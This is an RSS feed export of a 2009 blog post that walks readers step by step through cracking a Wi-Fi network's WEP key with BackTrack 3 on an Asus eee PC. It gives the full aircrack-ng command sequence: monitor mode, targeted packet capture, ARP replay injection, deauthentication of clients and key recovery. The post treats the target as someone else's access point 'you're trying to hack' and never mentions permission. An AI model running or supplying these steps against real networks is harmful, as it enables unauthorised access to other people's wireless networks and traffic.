<?xml version="1.0" encoding="UTF-8"?>
<rss version="2.0"
	xmlns:content="http://purl.org/rss/1.0/modules/content/"
	xmlns:wfw="http://wellformedweb.org/CommentAPI/"
	xmlns:dc="http://purl.org/dc/elements/1.1/"
	xmlns:atom="http://www.w3.org/2005/Atom"
	xmlns:sy="http://purl.org/rss/1.0/modules/syndication/"
	xmlns:slash="http://purl.org/rss/1.0/modules/slash/"
	>

<channel>
	<title>Scribute &#187; Cracking</title>
	<atom:link href="http://scribute.com/category/cracking/feed/" rel="self" type="application/rss+xml" />
	<link>http://scribute.com</link>
	<description>Blog of Knowledge.</description>
	<lastBuildDate>Thu, 08 Jul 2010 16:54:45 +0000</lastBuildDate>
	<language>en</language>
	<sy:updatePeriod>hourly</sy:updatePeriod>
	<sy:updateFrequency>1</sy:updateFrequency>
	<generator>http://wordpress.org/?v=abc</generator>
		<item>
		<title>Cracking WEP with eee PC 1000HA</title>
		<link>http://scribute.com/2009/01/cracking-wep-with-eee-pc-1000ha/</link>
		<comments>http://scribute.com/2009/01/cracking-wep-with-eee-pc-1000ha/#comments</comments>
		<pubDate>Sun, 11 Jan 2009 05:39:39 +0000</pubDate>
		<dc:creator>korupt3d</dc:creator>
				<category><![CDATA[Asus eee]]></category>
		<category><![CDATA[Cracking]]></category>
		<category><![CDATA[Hacking]]></category>
		<category><![CDATA[Linux]]></category>
		<category><![CDATA[1000ha]]></category>
		<category><![CDATA[aircrack]]></category>
		<category><![CDATA[aircrack-ng]]></category>
		<category><![CDATA[backtrack]]></category>
		<category><![CDATA[crack]]></category>
		<category><![CDATA[eee]]></category>
		<category><![CDATA[encryption]]></category>
		<category><![CDATA[wep]]></category>
		<category><![CDATA[wifi]]></category>
		<category><![CDATA[wireless]]></category>
		<category><![CDATA[wpa]]></category>

		<guid isPermaLink="false">http://scribute.com/?p=20</guid>
		<description><![CDATA[The first thing we are going to do is install BackTrack 3 onto an SD card so we can boot from the SD card without having to mess up our currently installed OS. I am not going to go into the details of how to do that here, as it is readily available all over [...]]]></description>
			<content:encoded><![CDATA[<p>The first thing we are going to do is install BackTrack 3 onto an SD card so we can boot from the SD card without having to mess up our currently installed OS. I am not going to go into the details of how to do that here, as it is readily available all over the internet. <del datetime="2010-07-04T15:45:20+00:00"><a href="http://www.andrewchapman.net/component/content/article/1-latestnews/25-bt3eeepc.html">Here</a> is the article I followed.</del> Apparently the article which I followed has been taken down, but a quick google search should find another.</p>
<p>After you have booted into BackTrack 3, we are ready for the fun part. The first thing we will do is shutdown our wifi card. In the terminal:</p>
<pre>ifconfig ath0 down</pre>
<p>Next we want to bring it back up, but in monitor mode:</p>
<pre>airmon-ng start wifi0</pre>
<p>You should see that a new interface called ath1 was created. That is the interface we are going to use for the rest of our cracking. Next:</p>
<pre>airodump-ng ath1</pre>
<p>This will list all of the wifi signals your card is picking up. There are two things you are going to want to write down: the BSSID and the Channel (CH), and also make sure the Encryption (ENC) is WEP. Or, if you don&#8217;t want to write thpre down, just open a new shell and leave that one open.</p>
<p>Now press
<pre>ctrl+c</pre>
<p> to stop airodump-ng. Open a new console (if you haven&#8217;t already) and type:<br />
<span id="more-20"></span></p>
<pre>airodump-ng --channel x --bssid y -w filename ath1</pre>
<p>Where x and y are the channel and bssid that you wrote down, respectively, and filename is whatever you want the prefix of the output files to be. I usually set the filename to something along the lines of the router name, that way when I&#8217;m searching through my cracked WEP files I know whats what.</p>
<p>Now leave that running and open another shell. Type</p>
<pre>ifconfig</pre>
<p>next to
<pre>ath1</pre>
<p> write down the first 6 sets of numbers in the long string next to HWaddr, replacing the dashes with colons (e.g. 00:11:22:33:44:55). That is your computer&#8217;s MAC address, whereas the bssid is the Access Point&#8217;s MAC address that you&#8217;re trying to hack.</p>
<p>Okay, now in the same window that you typed
<pre>ifconfig</pre>
<p>, type:</p>
<pre>aireplay-ng --arpreplay -b [Access Point's MAC] -h [Your MAC] ath1</pre>
<p>Now leave that running and open yet another shell, and type:</p>
<pre>aireplay-ng --deauth 5 -c [Your Mac] -a [Access Point's MAC] ath1</pre>
<p>Now in that same window type:</p>
<pre>aircrack-ng filename*.cap</pre>
<p>Where filename is whatever you entered earlier. And there you go! You should now have the WEP key. Leave feedback in the comments. I would love to answer your questions if any arrise.</p>
]]></content:encoded>
			<wfw:commentRss>http://scribute.com/2009/01/cracking-wep-with-eee-pc-1000ha/feed/</wfw:commentRss>
		<slash:comments>6</slash:comments>
		</item>
	</channel>
</rss>
